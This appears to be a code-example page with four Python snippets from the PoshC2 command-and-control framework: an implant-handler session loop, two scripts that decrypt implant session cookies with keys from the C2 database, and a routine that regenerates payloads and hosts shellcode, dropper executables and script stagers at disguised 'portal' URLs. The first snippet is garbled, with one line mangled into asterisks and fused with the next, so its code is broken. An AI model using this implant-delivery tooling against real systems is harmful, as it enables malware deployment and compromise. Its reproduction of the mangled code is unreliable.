Example #1
0
def main(args):
    signal.signal(signal.SIGINT, catch_exit)
    user = None
    autohide = None
    if len(args) > 0:
        parser = argparse.ArgumentParser(
            description='The command line for handling implants in PoshC2')
        parser.add_argument('-u', '--user', help='the user for this session')
        parser.add_argument(
            '-a',
            '--autohide',
            help='to autohide implants after 30 inactive beacons',
            action='store_true')
        args = parser.parse_args(args)
        user = args.user
        autohide = args.autohide
    while not user:
        print(Colours.GREEN + "A username is required for logging")
        user = input("Enter your username: "******"The project database has not been created yet")
        sys.exit()
    database_connect()
    new_c2_message("%s logged on." % user)
    clear()
    implant_handler_command_loop(user, "", autohide)
Example #2
0
def main():
    if len(sys.argv) != 2:
        print(
            "Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py <path/to/sec.log>"
        )
        print(
            "Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py <cookie value>"
        )
        sys.exit(0)

    database_connect()
    keys = get_keys()

    if not keys:
        print(
            f"{Colours.RED}[-] Could not get keys from database{Colours.END}")
        sys.exit(1)

    arg = sys.argv[1]

    try:
        log_file = open(arg, "r")
        print(f"[*] Checking file {arg}")
        for line in log_file:
            if re.search("SessionID", line):
                encrypted = line.split("SessionID=")[1]
                for key in keys:
                    decrypt_and_print(key[0], encrypted)
        print(
            f"{Colours.RED}[-] Failed to find and decrypt cookie{Colours.END}")
    except Exception:
        print(f"[*] Decrypting cookie value {arg}")
        for key in keys:
            decrypt_and_print(key[0], arg)
        print(f"{Colours.RED}[-] Failed to decrypt cookie value{Colours.END}")
Example #3
0
def existingdb(db):
    print("Using existing %s database / project" % db.value + Colours.GREEN)
    database_connect()
    C2 = get_c2server_all()
    if ((C2.PayloadCommsHost == PayloadCommsHost) and (C2.DomainFrontHeader == DomainFrontHeader)):
        qstart = "%squickstart.txt" % (PoshProjectDirectory)
        if os.path.exists(qstart):
            with open(qstart, 'r') as f:
                print(f.read())
    else:
        print("Error different IP so regenerating payloads")
        if os.path.exists("%spayloads_old" % PoshProjectDirectory):
            import shutil
            shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
        os.rename("%spayloads" % PoshProjectDirectory, "%spayloads_old" % PoshProjectDirectory)
        os.makedirs("%spayloads" % PoshProjectDirectory)
        update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
        update_item("QuickCommand", "C2Server", QuickCommand)
        update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
        C2 = get_c2server_all()
        urlId = new_urldetails(f"updated_host-{datetime.strftime(datetime.now(timezone.utc), '%Y-%m-%d-%H:%M:%S')}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
        newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
        newPayload.CreateAll()
        newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')

        # adding default hosted payloads
        QuickCommandURI = select_item("QuickCommand", "C2Server")
        insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
        insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
        insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
        insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
        insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
        insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
        insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
Example #4
0
#!/usr/bin/env python3

from poshc2.Colours import Colours
from poshc2.server.Core import decrypt
from poshc2.server.database.DB import get_keys, database_connect

import sys, re

file = open(sys.argv[1], "r")
database_connect()
result = get_keys()

if result:
    for line in file:
        if re.search("SessionID", line):
            for i in result:
                try:
                    value = decrypt(i[0], line.split('=')[1])
                    print(Colours.GREEN + "Success with Key %s - %s" %
                          (i[0], value))
                except Exception:
                    print(Colours.RED + "Failed with Key %s" % i[0])